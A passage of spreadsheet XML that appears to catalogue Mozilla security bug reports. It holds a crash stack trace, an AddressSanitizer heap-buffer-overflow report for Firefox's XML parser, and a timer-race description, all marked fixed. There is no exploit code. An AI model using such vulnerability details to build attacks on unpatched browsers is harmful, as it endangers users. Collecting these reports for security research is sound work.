148 ???                           	0x000000011e346830 0 + 4801718320
149 ???                           	0x000000011e34d390 0 + 4801745808
150 ???                           	0x000000011e34d440 0 + 4801745984
151 ???                           	0x000000011e34e6a0 0 + 4801750688
152 ???                           	0x000000011e34f220 0 + 4801753632
153 ???                           	0x000000011e3501b0 0 + 4801757616
154 ???                           	0x000000011e6b6620 0 + 4805322272
155 ???                           	0x000000011e6b6680 0 + 4805322368
156 ???                           	0x0000000101e8f080 0 + 4327010432
157 ???                           	0x000000011e3ab570 0 + 4802131312
158 ???                           	0x000000011e68a5b0 0 + 4805141936
159 ???                           	0x000000011e68a610 0 + 4805142032
160 ???                           	0x000000011e3ab1c0 0 + 4802130368
161 ???                           	0x000000011e3b77e0 0 + 4802181088
162 ???                           	0x000000011e3a8430 0 + 4802118704
163 ???                           	0x000000011e3a8380 0 + 4802118528
164 ???                           	0x000000011e3b9730 0 + 4802189104
165 ???                           	0x000000011e3b6d50 0 + 4802178384
166 ???                           	0x000000011e3b65e0 0 + 4802176480
167 ???                           	0x000000011e3b6640 0 + 4802176576
168 ???                           	0x000000011e3b5d60 0 + 4802174304
169 ???                           	0x000000011e3b5dc0 0 + 4802174400
170 ???                           	0x000000011e3b6110 0 + 4802175248
171 ???                           	0x000000011e3b6170 0 + 4802175344
172 ???                           	0x000000011e3ae6d0 0 + 4802143952
173 ???                           	0x000000011e3be590 0 + 4802209168
174 ???                           	0x000000011e3bdb50 0 + 4802206544
175 ???                           	0x000000011e3bdaa0 0 + 4802206368
176 ???                           	0x000000011e3be4e0 0 + 4802208992
177 ???                           	0x000000011e622b50 0 + 4804717392
178 ???                           	0x000000011e622040 0 + 4804714560
179 ???                           	0x000000011e6220d0 0 + 4804714704
180 ???                           	0x000000011e61fac0 0 + 4804704960
181 ???                           	0x000000011e61f6e0 0 + 4804703968
182 ???                           	0x000000011e61f740 0 + 4804704064
183 ???                           	0x000000011e61ebd0 0 + 4804701136
184 ???                           	0x000000011e61ec60 0 + 4804701280
185 ???                           	0x000000011e61dd40 0 + 4804697408
186 ???                           	0x000000011e61dda0 0 + 4804697504
187 ???                           	0x000000011e61d9c0 0 + 4804696512
188 ???                           	0x000000011e62d660 0 + 4804761184
189 ???                           	0x000000011e62d6e0 0 + 4804761312
190 ???                           	0x000000011e62ba10 0 + 4804753936
191 ???                           	0x000000011e628700 0 + 4804740864
192 ???                           	0x000000011e628790 0 + 4804741008
193 ???                           	0x000000011e627fa0 0 + 4804738976
194 ???                           	0x000000011e625f20 0 + 4804730656
195 ???                           	0x000000011e625f80 0 + 4804730752
196 ???                           	0x000000011e6247b0 0 + 4804724656
197 ???                           	0x000000011e624850 0 + 4804724816
198 ???                           	0x000000011e63e490 0 + 4804830352
199 ???                           	0x000000011e63e520 0 + 4804830496
200 ???                           	0x000000011e650f80 0 + 4804906880
201 ???                           	0x000000011e6507f0 0 + 4804904944
202 ???                           	0x000000011e650850 0 + 4804905040
203 ???                           	0x000000011e64f560 0 + 4804900192
204 ???                           	0x000000011e64f5e0 0 + 4804900320
205 ???                           	0x000000011e64d070 0 + 4804890736
206 ???                           	0x000000011e64c270 0 + 4804887152
207 ???                           	0x000000011e64be80 0 + 4804886144
208 ???                           	0x000000011e64bf30 0 + 4804886320
209 ???                           	0x000000011e64b880 0 + 4804884608
210 ???                           	0x000000011e64a970 0 + 4804880752
211 ???                           	0x000000011e64aa00 0 + 4804880896
212 ???                           	0x000000011e659200 0 + 4804940288
213 ???                           	0x000000011e659290 0 + 4804940432
214 ???                           	0x000000011e658360 0 + 4804936544
215 ???                           	0x000000011e656ed0 0 + 4804931280
216 ???                           	0x000000011e656350 0 + 4804928336
217 ???                           	0x000000011e654c60 0 + 4804922464
218 ???                           	0x000000011e653270 0 + 4804915824
219 ???                           	0x000000011e653300 0 + 4804915968
220 ???                           	0x000000011e65ce30 0 + 4804955696
221 ???                           	0x000000011e65ca80 0 + 4804954752
222 ???                           	0x000000011e65cb10 0 + 4804954896
223 ???                           	0x000000011e65b6d0 0 + 4804949712
224 ???                           	0x000000011e65b2e0 0 + 4804948704
225 ???                           	0x000000011e65a7a0 0 + 4804945824
226 ???                           	0x000000011e65a800 0 + 4804945920
227 ???                           	0x000000011e659fc0 0 + 4804943808
228 ???                           	0x000000011e65a050 0 + 4804943952
229 ???                           	0x000000011e663e90 0 + 4804984464
230 ???                           	0x000000011e662090 0 + 4804976784
231 ???                           	0x000000011e6620f0 0 + 4804976880
232 ???                           	0x000000011e660cd0 0 + 4804971728
233 ???                           	0x000000011e6608f0 0 + 4804970736
234 ???                           	0x000000011e660950 0 + 4804970832
235 ???                           	0x000000011e660540 0 + 4804969792
236 ???                           	0x000000011e6605d0 0 + 4804969936
237 ???                           	0x000000011e6601c0 0 + 4804968896
238 ???                           	0x000000011e65f790 0 + 4804966288
239 ???                           	0x000000011e65f820 0 + 4804966432
240 ???                           	0x000000011e65e390 0 + 4804961168
241 ???                           	0x000000011e65dfe0 0 + 4804960224
242 ???                           	0x000000011e65e040 0 + 4804960320
243 ???                           	0x000000011e668ea0 0 + 4805004960
244 ???                           	0x000000011e668f00 0 + 4805005056
245 ???                           	0x000000011e6680f0 0 + 4805001456
246 ???                           	0x000000011e668180 0 + 4805001600
247 ???                           	0x000000011e667740 0 + 4804998976
248 ???                           	0x000000011e666be0 0 + 4804996064
249 ???                           	0x000000011e666c90 0 + 4804996240
250 ???                           	0x000000011e6668a0 0 + 4804995232
251 ???                           	0x000000011e665640 0 + 4804990528
252 ???                           	0x000000011e665260 0 + 4804989536
253 ???                           	0x000000011e665300 0 + 4804989696
254 ???                           	0x000000011e66e730 0 + 4805027632
255 ???                           	0x000000011e66dd40 0 + 4805025088
256 ???                           	0x000000011e66d300 0 + 4805022464
257 ???                           	0x000000011e66c8d0 0 + 4805019856
258 ???                           	0x000000011e66c930 0 + 4805019952
259 ???                           	0x000000011e66ba50 0 + 4805016144
260 ???                           	0x000000011e66b6e0 0 + 4805015264
261 ???                           	0x000000011e66af40 0 + 4805013312
262 ???                           	0x000000011e66b2b0 0 + 4805014192
263 ???                           	0x000000011e6733b0 0 + 4805047216
264 ???                           	0x000000011e672c50 0 + 4805045328
265 ???                           	0x000000011e672cb0 0 + 4805045424
266 ???                           	0x000000011e670ea0 0 + 4805037728
267 ???                           	0x000000011e66ea80 0 + 4805028480
268 ???                           	0x000000011e66eae0 0 + 4805028576
269 ???                           	0x000000011e66fcf0 0 + 4805033200
270 ???                           	0x000000011e6790e0 0 + 4805071072
271 ???                           	0x000000011e676bf0 0 + 4805061616
272 ???                           	0x000000011e676f60 0 + 4805062496
273 ???                           	0x000000011e676fc0 0 + 4805062592
274 ???                           	0x000000011e678d60 0 + 4805070176
275 ???                           	0x000000011e6786e0 0 + 4805068512
276 ???                           	0x000000011e678790 0 + 4805068688
277 ???                           	0x000000011e6767f0 0 + 4805060592
278 ???                           	0x000000011e675e20 0 + 4805058080
279 ???                           	0x000000011e674620 0 + 4805051936
280 ???                           	0x000000011e6746a0 0 + 4805052064
281 ???                           	0x000000011e673b70 0 + 4805049200
282 ???                           	0x000000011e67d9b0 0 + 4805089712
283 ???                           	0x000000011e67da10 0 + 4805089808
284 ???                           	0x000000011e67b640 0 + 4805080640
285 ???                           	0x000000011e67b290 0 + 4805079696
286 ???                           	0x000000011e67b2f0 0 + 4805079792
287 ???                           	0x000000011e6c2040 0 + 4805369920
288 ???                           	0x000000011ea3cc10 0 + 4809018384
289 ???                           	0x000000011ea3cc70 0 + 4809018480
290 ???                           	0x000000011e34acd0 0 + 4801735888
291 ???                           	0x000000011e36db40 0 + 4801878848
292 ???                           	0x000000011e3a7a50 0 + 4802116176
293 ???                           	0x000000011e3a7ae0 0 + 4802116320
294 ???                           	0x000000011e3f5fa0 0 + 4802437024
295 ???                           	0x000000011e3f6060 0 + 4802437216
296 ???                           	0x000000011e629890 0 + 4804745360
297 ???                           	0x000000011e64a5b0 0 + 4804879792
298 ???                           	0x000000011e35a090 0 + 4801798288
299 ???                           	0x000000011e64fed0 0 + 4804902608
300 ???                           	0x000000011e6847c0 0 + 4805117888
301 ???                           	0x000000011ea1bd40 0 + 4808883520
302 ???                           	0x000000011ea1bdf0 0 + 4808883696
303 ???                           	0x000000011e3555d0 0 + 4801779152
304 ???                           	0x000000011e3dba20 0 + 4802329120
305 ???                           	0x000000011e3dbab0 0 + 4802329264
306 ???                           	0x000000011e3dbd00 0 + 4802329856
307 ???                           	0x000000011e688970 0 + 4805134704
308 ???                           	0x000000011e6889d0 0 + 4805134800
309 ???                           	0x000000011e6c2900 0 + 4805372160
310 ???                           	0x000000011ea0dec0 0 + 4808826560
311 ???                           	0x000000011ea0df80 0 + 4808826752
312 ???                           	0x000000011e3629b0 0 + 4801833392
313 ???                           	0x000000011e364350 0 + 4801839952
314 ???                           	0x000000011e364420 0 + 4801840160
315 ???                           	0x000000011e369410 0 + 4801860624
316 ???                           	0x000000011e3739f0 0 + 4801903088
317 ???                           	0x000000011e372780 0 + 4801898368
318 ???                           	0x000000011e372810 0 + 4801898512
319 ???                           	0x000000011e377160 0 + 4801917280
320 ???                           	0x000000011e3771e0 0 + 4801917408
321 ???                           	0x000000011e3758f0 0 + 4801911024
322 ???                           	0x000000011e34b500 0 + 4801737984
323 ???                           	0x000000011e37d890 0 + 4801943696
324 ???                           	0x000000011e34b560 0 + 4801738080
325 ???                           	0x000000011e381fe0 0 + 4801961952
326 ???                           	0x000000011e3a4700 0 + 4802103040
327 ???                           	0x000000011e3aabb0 0 + 4802128816
328 ???                           	0x000000011e3aac10 0 + 4802128912
329 ???                           	0x000000011e3aac70 0 + 4802129008
330 ???                           	0x000000011e3c7020 0 + 4802244640
331 ???                           	0x000000011e3d8b40 0 + 4802317120
332 ???                           	0x000000011e3e4880 0 + 4802365568
333 ???                           	0x000000011e3e48e0 0 + 4802365664
334 ???                           	0x000000011e3f52d0 0 + 4802433744
335 ???                           	0x000000011e3f5330 0 + 4802433840
336 ???                           	0x000000011e604ae0 0 + 4804594400
337 ???                           	0x000000011e62bd60 0 + 4804754784
338 ???                           	0x000000011e62bdc0 0 + 4804754880
339 ???                           	0x000000011e634ae0 0 + 4804791008
340 ???                           	0x000000011e634bb0 0 + 4804791216
341 ???                           	0x000000011e63a430 0 + 4804813872
342 ???                           	0x000000011e64ba60 0 + 4804885088
343 ???                           	0x000000011e64ad70 0 + 4804881776
344 ???                           	0x000000011e64f1b0 0 + 4804899248
345 ???                           	0x000000011e64f210 0 + 4804899344
346 ???                           	0x000000011e6566f0 0 + 4804929264
347 ???                           	0x000000011e66a000 0 + 4805009408
348 ???                           	0x000000011e6663c0 0 + 4804993984
349 ???                           	0x000000011e666460 0 + 4804994144
350 ???                           	0x000000011e6742b0 0 + 4805051056
351 ???                           	0x000000011e67af30 0 + 4805078832
352 ???                           	0x000000011e67af90 0 + 4805078928
353 ???                           	0x000000011e38c210 0 + 4802003472
354 ???                           	0x000000011ea9b290 0 + 4809405072
355 ???                           	0x000000011ea9b2f0 0 + 4809405168
356 ???                           	0x000000011ea6e1e0 0 + 4809220576
357 ???                           	0x000000011e6788b0 0 + 4805068976
358 ???                           	0x000000011e3482b0 0 + 4801725104
359 ???                           	0x000000011e34e420 0 + 4801750048
360 ???                           	0x000000011e360fd0 0 + 4801826768
361 ???                           	0x000000011e348310 0 + 4801725200
362 ???                           	0x000000011ea59bf0 0 + 4809137136
363 ???                           	0x000000011e3dbff0 0 + 4802330608
364 ???                           	0x000000011ea9a330 0 + 4809401136
365 ???                           	0x000000011ea59b40 0 + 4809136960
366 ???                           	0x000000011ea9a250 0 + 4809400912
367 ???                           	0x0000000122169630 0 + 4866872880
368 ???                           	0x00000001221694e0 0 + 4866872544
369 ???                           	0x0000000122169590 0 + 4866872720
370 ???                           	0x0000000122169d70 0 + 4866874736
371 ???                           	0x0000000122169e40 0 + 4866874944
372 ???                           	0x000000012216a100 0 + 4866875648
373 ???                           	0x0000000122169fe0 0 + 4866875360
374 ???                           	0x000000012216a090 0 + 4866875536
375 ???                           	0x000000012216a550 0 + 4866876752
376 ???                           	0x000000012216a6a0 0 + 4866877088
377 ???                           	0x000000012216a750 0 + 4866877264
378 ???                           	0x000000012216a8d0 0 + 4866877648
379 ???                           	0x000000012216aa20 0 + 4866877984
380 ???                           	0x000000012216aba0 0 + 4866878368
381 ???                           	0x000000012216ad80 0 + 4866878848
382 ???                           	0x000000012216b1c0 0 + 4866879936
383 ???                           	0x000000012216b620 0 + 4866881056
384 ???                           	0x000000012216b680 0 + 4866881152
385 ???                           	0x000000012216b7a0 0 + 4866881440
386 ???                           	0x000000012216b970 0 + 4866881904
387 ???                           	0x000000012216ba20 0 + 4866882080
388 ???                           	0x000000012216c0c0 0 + 4866883776
389 ???                           	0x000000012216bfc0 0 + 4866883520
390 ???                           	0x000000012216c240 0 + 4866884160
391 ???                           	0x000000012216c370 0 + 4866884464
392 ???                           	0x000000012216c460 0 + 4866884704
393 ???                           	0x000000012216c9e0 0 + 4866886112
394 ???                           	0x000000012216cad0 0 + 4866886352
395 ???                           	0x000000012216cca0 0 + 4866886816
396 ???                           	0x000000012216d1a0 0 + 4866888096
397 ???                           	0x000000012216d600 0 + 4866889216
398 ???                           	0x000000012200a5b0 0 + 4865435056
399 ???                           	0x0000000122008850 0 + 4865427536
400 ???                           	0x000000012200aaf0 0 + 4865436400
401 ???                           	0x000000012200ab50 0 + 4865436496
402 ???                           	0x000000012200b4c0 0 + 4865438912
403 ???                           	0x000000012200b710 0 + 4865439504
404 ???                           	0x000000012200a970 0 + 4865436016
405 ???                           	0x000000012200aa50 0 + 4865436240
406 ???                           	0x000000012200a900 0 + 4865435904
407 ???                           	0x000000012200c360 0 + 4865442656
408 ???                           	0x000000012200c580 0 + 4865443200
409 ???                           	0x000000012200c880 0 + 4865443968
410 ???                           	0x000000012200c630 0 + 4865443376
411 ???                           	0x000000012200be00 0 + 4865441280
412 ???                           	0x000000012200d5c0 0 + 4865447360
413 ???                           	0x000000012200d710 0 + 4865447696
414 ???                           	0x000000012200d870 0 + 4865448048
415 ???                           	0x000000012200da20 0 + 4865448480
416 ???                           	0x000000012200dbd0 0 + 4865448912
417 ???                           	0x000000012200dd80 0 + 4865449344
418 ???                           	0x000000012200df30 0 + 4865449776
419 ???                           	0x000000012200e0a0 0 + 4865450144
420 ???                           	0x000000012200e210 0 + 4865450512
421 ???                           	0x000000012200e380 0 + 4865450880
422 ???                           	0x000000012200e4f0 0 + 4865451248
423 ???                           	0x000000012200e680 0 + 4865451648
424 ???                           	0x000000012200e860 0 + 4865452128
425 ???                           	0x000000012200ea70 0 + 4865452656
426 ???                           	0x000000012200edc0 0 + 4865453504
427 ???                           	0x000000012200f040 0 + 4865454144
428 ???                           	0x000000012200f250 0 + 4865454672
429 ???                           	0x000000012200f420 0 + 4865455136
430 ???                           	0x000000012200f590 0 + 4865455504
431 ???                           	0x000000012200f700 0 + 4865455872
432 ???                           	0x000000012200f870 0 + 4865456240
433 ???                           	0x000000012200f9e0 0 + 4865456608
434 ???                           	0x000000012200fb50 0 + 4865456976
435 ???                           	0x000000012200fcc0 0 + 4865457344
436 ???                           	0x000000012200fe30 0 + 4865457712
437 ???                           	0x0000000122038880 0 + 4865624192
438 ???                           	0x00000001220394b0 0 + 4865627312
439 ???                           	0x000000012202e430 0 + 4865582128
440 ???                           	0x000000012202ecf0 0 + 4865584368
441 ???                           	0x000000012202e810 0 + 4865583120
442 ???                           	0x000000012202efa0 0 + 4865585056
443 ???                           	0x000000012202f060 0 + 4865585248
444 ???                           	0x000000012202d7f0 0 + 4865578992
445 ???                           	0x000000012202d5b0 0 + 4865578416
446 ???                           	0x000000012202f790 0 + 4865587088
447 ???                           	0x000000012202f3d0 0 + 4865586128
448 ???                           	0x000000012202e060 0 + 4865581152
449 ???                           	0x000000012202df70 0 + 4865580912
450 ???                           	0x0000000122039430 0 + 4865627184
451 ???                           	0x000000012202f980 0 + 4865587584
452 ???                           	0x000000012202fa50 0 + 4865587792
453 ???                           	0x000000012202fb10 0 + 4865587984
454 ???                           	0x000000012202fbe0 0</t>
        </is>
      </c>
      <c r="X4284" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4285">
      <c r="A4285" t="n">
        <v>1140537</v>
      </c>
      <c r="B4285" t="inlineStr">
        <is>
          <t>2015-03-06 12:16:18 -0800</t>
        </is>
      </c>
      <c r="C4285" t="inlineStr">
        <is>
          <t>Buffer overflow xml parser</t>
        </is>
      </c>
      <c r="D4285" t="inlineStr">
        <is>
          <t>2024-05-30 08:40:13 -0700</t>
        </is>
      </c>
      <c r="E4285" t="n">
        <v>1</v>
      </c>
      <c r="F4285" t="n">
        <v>1</v>
      </c>
      <c r="G4285" t="n">
        <v>3</v>
      </c>
      <c r="H4285" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4285" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4285" t="inlineStr">
        <is>
          <t>XML</t>
        </is>
      </c>
      <c r="K4285" t="inlineStr">
        <is>
          <t>36 Branch</t>
        </is>
      </c>
      <c r="L4285" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4285" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4285" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4285" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4285" t="inlineStr">
        <is>
          <t>[adv-main38+][adv-esr31.7+]</t>
        </is>
      </c>
      <c r="Q4285" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4285" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4285" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T4285" t="n">
        <v>1</v>
      </c>
      <c r="U4285" t="n">
        <v>0</v>
      </c>
      <c r="V4285" t="n">
        <v>46</v>
      </c>
      <c r="W4285" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.115 Safari/537.36
Steps to reproduce:
FF last version (last ASAN build)
http://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-release-linux64-asan/latest/firefox-36.0.1.en-US.linux-x86_64-asan.tar.bz2
Actual results:
=================================================================
==30124==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7fff018ba800 at pc 0x45f23c bp 0x7fffffff8970 sp 0x7fffffff8128
WRITE of size 4718532 at 0x7fff018ba800 thread T0
    #0 0x45f23b (/home/user/testing/firefox/firefox+0x45f23b)
    #1 0x7fffedd9dc34 (/home/user/testing/firefox/libxul.so+0x811cc34)
    #2 0x7fffe86d7e4a (/home/user/testing/firefox/libxul.so+0x2a56e4a)
    #3 0x7fffe86d9256 (/home/user/testing/firefox/libxul.so+0x2a58256)
    #4 0x7fffe86e7c59 (/home/user/testing/firefox/libxul.so+0x2a66c59)
    #5 0x7fffe86e39fd (/home/user/testing/firefox/libxul.so+0x2a629fd)
    #6 0x7fffe86e8eea (/home/user/testing/firefox/libxul.so+0x2a67eea)
    #7 0x7fffe73aef5d (/home/user/testing/firefox/libxul.so+0x172df5d)
    #8 0x7fffe72fe02e (/home/user/testing/firefox/libxul.so+0x167d02e)
    #9 0x7fffe7650ac1 (/home/user/testing/firefox/libxul.so+0x19cfac1)
    #10 0x7fffe7279ab4 (/home/user/testing/firefox/libxul.so+0x15f8ab4)
    #11 0x7fffe7278897 (/home/user/testing/firefox/libxul.so+0x15f7897)
    #12 0x7fffe70b6a69 (/home/user/testing/firefox/libxul.so+0x1435a69)
    #13 0x7fffe70e8bbf (/home/user/testing/firefox/libxul.so+0x1467bbf)
    #14 0x7fffe714549a (/home/user/testing/firefox/libxul.so+0x14c449a)
    #15 0x7fffe70e7b5e (/home/user/testing/firefox/libxul.so+0x1466b5e)
    #16 0x7fffe70f3210 (/home/user/testing/firefox/libxul.so+0x1472210)
    #17 0x7fffe70e8bbf (/home/user/testing/firefox/libxul.so+0x1467bbf)
    #18 0x7fffe714549a (/home/user/testing/firefox/libxul.so+0x14c449a)
    #19 0x7fffe70e7b5e (/home/user/testing/firefox/libxul.so+0x1466b5e)
    #20 0x7fffe70f3210 (/home/user/testing/firefox/libxul.so+0x1472210)
    #21 0x7fffe70e8bbf (/home/user/testing/firefox/libxul.so+0x1467bbf)
    #22 0x7fffe714549a (/home/user/testing/firefox/libxul.so+0x14c449a)
    #23 0x7fffe70e7b5e (/home/user/testing/firefox/libxul.so+0x1466b5e)
    #24 0x7fffe70f3210 (/home/user/testing/firefox/libxul.so+0x1472210)
    #25 0x7fffe70e8bbf (/home/user/testing/firefox/libxul.so+0x1467bbf)
    #26 0x7fffe714549a (/home/user/testing/firefox/libxul.so+0x14c449a)
    #27 0x7fffe70e7b5e (/home/user/testing/firefox/libxul.so+0x1466b5e)
    #28 0x7fffe70f3210 (/home/user/testing/firefox/libxul.so+0x1472210)
    #29 0x7fffe70e8bbf (/home/user/testing/firefox/libxul.so+0x1467bbf)
    #30 0x7fffe714549a (/home/user/testing/firefox/libxul.so+0x14c449a)
    #31 0x7fffe70e7b5e (/home/user/testing/firefox/libxul.so+0x1466b5e)
    #32 0x7fffe70f3210 (/home/user/testing/firefox/libxul.so+0x1472210)
    #33 0x7fffe70e8bbf (/home/user/testing/firefox/libxul.so+0x1467bbf)
    #34 0x7fffe714549a (/home/user/testing/firefox/libxul.so+0x14c449a)
    #35 0x7fffe70e7b5e (/home/user/testing/firefox/libxul.so+0x1466b5e)
    #36 0x7fffe70f3210 (/home/user/testing/firefox/libxul.so+0x1472210)
    #37 0x7fffe70e8bbf (/home/user/testing/firefox/libxul.so+0x1467bbf)
    #38 0x7fffe714549a (/home/user/testing/firefox/libxul.so+0x14c449a)
    #39 0x7fffe70e7b5e (/home/user/testing/firefox/libxul.so+0x1466b5e)
    #40 0x7fffe70f3210 (/home/user/testing/firefox/libxul.so+0x1472210)
    #41 0x7fffe70e8bbf (/home/user/testing/firefox/libxul.so+0x1467bbf)
    #42 0x7fffe714549a (/home/user/testing/firefox/libxul.so+0x14c449a)
    #43 0x7fffe7949d99 (/home/user/testing/firefox/libxul.so+0x1cc8d99)
    #44 0x7fffe78f8d1c (/home/user/testing/firefox/libxul.so+0x1c77d1c)
    #45 0x7fffebc8ed87 (/home/user/testing/firefox/libxul.so+0x600dd87)
    #46 0x7fffed667fa8 (/home/user/testing/firefox/libxul.so+0x79e6fa8)
    #47 0x7fffed753d6e (/home/user/testing/firefox/libxul.so+0x7ad2d6e)
    #48 0x7fffed754c93 (/home/user/testing/firefox/libxul.so+0x7ad3c93)
    #49 0x7fffed755b0d (/home/user/testing/firefox/libxul.so+0x7ad4b0d)
    #50 0x48a2fa (/home/user/testing/firefox/firefox+0x48a2fa)
    #51 0x7ffff6c0076c (/lib/x86_64-linux-gnu/libc.so.6+0x2176c)
    #52 0x48975c (/home/user/testing/firefox/firefox+0x48975c)
0x7fff018ba800 is located 0 bytes to the right of 2147237888-byte region [0x7ffe818f6800,0x7fff018ba800)
allocated by thread T0 here:
    #0 0x471d71 (/home/user/testing/firefox/firefox+0x471d71)
    #1 0x7fffedd9ed25 (/home/user/testing/firefox/libxul.so+0x811dd25)
    #2 0x7fffedd9db81 (/home/user/testing/firefox/libxul.so+0x811cb81)
    #3 0x7fffe86d7e4a (/home/user/testing/firefox/libxul.so+0x2a56e4a)
    #4 0x7fffe86d9256 (/home/user/testing/firefox/libxul.so+0x2a58256)
    #5 0x7fffe86e7c59 (/home/user/testing/firefox/libxul.so+0x2a66c59)
    #6 0x7fffe86e39fd (/home/user/testing/firefox/libxul.so+0x2a629fd)
    #7 0x7fffe86e8eea (/home/user/testing/firefox/libxul.so+0x2a67eea)
    #8 0x7fffe73aef5d (/home/user/testing/firefox/libxul.so+0x172df5d)
    #9 0x7fffe72fe02e (/home/user/testing/firefox/libxul.so+0x167d02e)
    #10 0x7fffe7650ac1 (/home/user/testing/firefox/libxul.so+0x19cfac1)
    #11 0x7fffe7279ab4 (/home/user/testing/firefox/libxul.so+0x15f8ab4)
    #12 0x7fffe7278897 (/home/user/testing/firefox/libxul.so+0x15f7897)
    #13 0x7fffe70b6a69 (/home/user/testing/firefox/libxul.so+0x1435a69)
    #14 0x7fffe70e8bbf (/home/user/testing/firefox/libxul.so+0x1467bbf)
    #15 0x7fffe714549a (/home/user/testing/firefox/libxul.so+0x14c449a)
    #16 0x7fffe7949d99 (/home/user/testing/firefox/libxul.so+0x1cc8d99)
    #17 0x7fffe78f8d1c (/home/user/testing/firefox/libxul.so+0x1c77d1c)
    #18 0x7fffebc8ed87 (/home/user/testing/firefox/libxul.so+0x600dd87)
    #19 0x7fffed667fa8 (/home/user/testing/firefox/libxul.so+0x79e6fa8)
    #20 0x7fffed753d6e (/home/user/testing/firefox/libxul.so+0x7ad2d6e)
    #21 0x7fffed754c93 (/home/user/testing/firefox/libxul.so+0x7ad3c93)
    #22 0x7fffed755b0d (/home/user/testing/firefox/libxul.so+0x7ad4b0d)
    #23 0x48a2fa (/home/user/testing/firefox/firefox+0x48a2fa)
    #24 0x7ffff6c0076c (/lib/x86_64-linux-gnu/libc.so.6+0x2176c)
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
  0x10006030f4b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006030f4c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006030f4d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006030f4e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x10006030f4f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x10006030f500:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x10006030f510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x10006030f520: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x10006030f530: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x10006030f540: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x10006030f550: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Sta==30124==ABORTING</t>
        </is>
      </c>
      <c r="X4285" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4286">
      <c r="A4286" t="n">
        <v>1033121</v>
      </c>
      <c r="B4286" t="inlineStr">
        <is>
          <t>2014-07-01 18:56:11 -0700</t>
        </is>
      </c>
      <c r="C4286" t="inlineStr">
        <is>
          <t>Race in nsTimerEvent destructor</t>
        </is>
      </c>
      <c r="D4286" t="inlineStr">
        <is>
          <t>2016-06-04 16:02:14 -0700</t>
        </is>
      </c>
      <c r="E4286" t="n">
        <v>1</v>
      </c>
      <c r="F4286" t="n">
        <v>1</v>
      </c>
      <c r="G4286" t="n">
        <v>3</v>
      </c>
      <c r="H4286" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4286" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4286" t="inlineStr">
        <is>
          <t>XPCOM</t>
        </is>
      </c>
      <c r="K4286" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4286" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4286" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4286" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4286" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4286" t="inlineStr">
        <is>
          <t>[adv-main32+][adv-esr31.1+]</t>
        </is>
      </c>
      <c r="Q4286" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4286" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4286" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T4286" t="n">
        <v>1</v>
      </c>
      <c r="U4286" t="n">
        <v>0</v>
      </c>
      <c r="V4286" t="n">
        <v>43</v>
      </c>
      <c r="W4286" t="inlineStr">
        <is>
          <t>I found this problem when debugging timeouts in test_playback_rate.html. [1]
It looks like it is possible for |event| [2] to be executed in the target thread before nsTimerImpl::PostTimerEvent returns. Then nsTimerEvent will be deleted on exit of nsTimerImpl::PostTimerEvent in the timer thread. In the destructor of nsTimerEvent, it will call nsTimerImpl::Release in the timer thread. At the same time, it is also possible for nsTimerImpl::InitWithCallback to be called in the target thread. Therefore we might hit bug 997844 comment 0 again.
[1] bug 1020707 comment 42
[2] http://hg.mozilla.org/mozilla-central/file/3a28d3bb4f55/xpcom/threads/nsTimerImpl.cpp#l763</t>
        </is>
      </c>
      <c r="X4286" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4287">
      <c r="A4287" t="n">
        <v>432068</v>
      </c>
      <c r="B4287" t="inlineStr">
        <is>
          <t>2008-05-03 17:02:13 -0700</t>
        </is>
      </c>
      <c r="C4287" t="inlineStr">
        <is>
          <t>Crash [@ nsListBoxBodyFrame::GetNextItemBox] with &lt;xul:listbox&gt;, XBL</t>
        </is>
      </c>
      <c r="D4287" t="inlineStr">
        <is>
          <t>2018-04-30 13:11:55 -0700</t>
        </is>
      </c>
      <c r="E4287" t="n">
        <v>1</v>
      </c>
